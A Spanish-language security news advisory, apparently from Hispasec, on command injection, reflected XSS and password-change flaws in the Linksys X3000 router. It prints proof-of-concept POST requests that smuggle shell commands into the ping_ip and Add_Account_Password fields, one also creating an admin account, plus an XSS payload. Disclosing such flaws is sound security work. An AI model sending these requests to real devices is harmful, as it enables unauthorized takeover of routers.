Múltiples vulnerabilidades en router Linksys X3000

Hispasec

hace 13 años

El investigador de seguridad Michael Messner ha descubierto varios fallos de seguridad en el modelo X3000 de router WiFi de la marca Linksys de Cisco. Estas vulnerabilidades permiten la ejecución de código remoto a través de la inyección de comandos en el sistema operativo subyacente, cross-site scripting y posibilidad de cambiar la contraseña sin preguntar por la contraseña actual.

Inyección de comandos

Se aprovecha la falta de validación en el contenido suministrado por el usuario en los campos ping_ip y Add_Account_Password. Las siguientes peticiones POST pueden servir como prueba de concepto:

Parámetro ping_ip de la página Diagnostics.asp:

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=%3b%20ping%20-c%201%20192%2e168%2e1%2e147%20%3b&ping_size=&ping_times=5&traceroute_ip=

Parámetro Add_Account_Password de la página User_Properties.asp:

command=device_data&cur_ipaddr=192.168.178.188&next_page=StorageAdminUserAdd1.htm&redirect_timer=1&reboot=0&data1=&next_page=&submit_button=User_Properties&submit_type=create_user&change_action=gozila_cgi&Add_Account_Group_Name=&access_group_name=&delete_groups=&Modify_Account_Name=&Add_Account_Name=pwnd&full_name=pwnd&user_desc=pwnd&Add_Account_Password=`ping%20192%2e168%2e178%2e103`&Add_Account_PasswordConfirm=pwnd&Add_Account_Group=admin

Con estas peticiones conseguimos ejecutar en el sistema el comando ping.

XSS no persistente

También falta de validación en los parámetros ping_ip, sortby y submit_button.

Parámetro ping_ip de la página Diagnostics.asp:

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=1.1.1.1′>alert(1)&ping_size=32&ping_times=5&traceroute_ip=